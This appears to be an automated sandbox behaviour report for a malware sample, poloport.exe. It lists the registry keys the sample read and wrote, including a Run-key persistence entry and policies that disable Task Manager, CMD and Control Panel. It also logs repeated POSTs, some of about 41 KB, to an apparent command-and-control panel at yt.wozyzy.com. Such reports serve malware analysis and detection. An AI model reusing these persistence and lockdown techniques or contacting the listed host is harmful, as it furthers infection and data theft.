HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\QueryLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PathLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbThrottlingEnabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighMaxLimitFactor HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbTaskMaxSleep HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1Mult HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2Mult HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3Mult HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Unchecked Task Count HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Directory 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Build HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\MOF Self-Install Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Default Repository Driver HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueCoreFsrepVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Cache Spill Ratio HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckPointValue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SnapShotValue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckRepositoryOnNextStartup HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NumWriteIdCheck HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Size HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Item Age (ms) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NextAutoRecoverFile HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Enable Provider Subsystem HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1D11B68C-3611-45AD-A3A9-DF5BEF6A3827}\ProcessIdentifier 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\Provider 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableEvents HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssToBeInitialized HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Low Threshold On Events (B) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\High Threshold On Events (B) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Wait On Events (ms) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Merger Query Arbitration Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerBatchSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SetupDate HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ClientCallbackTimeout HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Async Result Queue Size HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerQueueThreshold HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Tasks HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cimv2 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cimv2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32 
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default) 
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\Synchronization HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\AppId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders\ROOT\CIMV2:__Win32Provider.Name="CIMWin32" HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32\(Default) 
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\SecurityCenter2 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\SecurityCenter2 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\SecurityCenter HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\SecurityCenter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Sink Transmit Buffer Size HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\DefaultRpcStackSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain HKEY_CURRENT_USER\Control Panel\International\LocaleName HKEY_CURRENT_USER\Control Panel\International\sCountry HKEY_CURRENT_USER\Control Panel\International\sList HKEY_CURRENT_USER\Control Panel\International\sDecimal HKEY_CURRENT_USER\Control Panel\International\sThousand HKEY_CURRENT_USER\Control Panel\International\sGrouping HKEY_CURRENT_USER\Control Panel\International\sNativeDigits HKEY_CURRENT_USER\Control Panel\International\sCurrency HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep HKEY_CURRENT_USER\Control Panel\International\sMonGrouping HKEY_CURRENT_USER\Control Panel\International\sPositiveSign HKEY_CURRENT_USER\Control Panel\International\sNegativeSign HKEY_CURRENT_USER\Control 
Write Keys
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\jit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Server HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\List of event-active namespaces HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Delete Keys
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CustomPropertyHwIdKey
Mutexes
Resolved APIs
Execute Commands
- "C:\Users\Seven01\AppData\Local\Temp\poloport.exe"
- C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Started Services
Nothing to display
Created Services
Nothing to display
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven05b_64 | Seven05b_64 | VirtualBox | 2018-02-08 22:29:19 | 2018-02-08 22:32:13 | 174 |
34 HTTP Request(s) detected
http://checkip.dyndns.org/
- Hostname: checkip.dyndns.org
- IP Address: 216.146.43.71
- Port: 80
- Count: 1
GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 11
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 242 Expect: 100-continue Connection: Keep-Alive
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 314
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 294 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 292 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 601
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 242 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 171
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 296 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 1020 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41432 Expect: 100-continue Connection: Keep-Alive
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 264 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 21
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41478 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41478 Expect: 100-continue Connection: Keep-Alive
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 9
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41480 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 4
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41482 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 3
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 42530 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 2
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 42528 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 42532 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41774 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 2
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41778 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41776 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41484 Expect: 100-continue
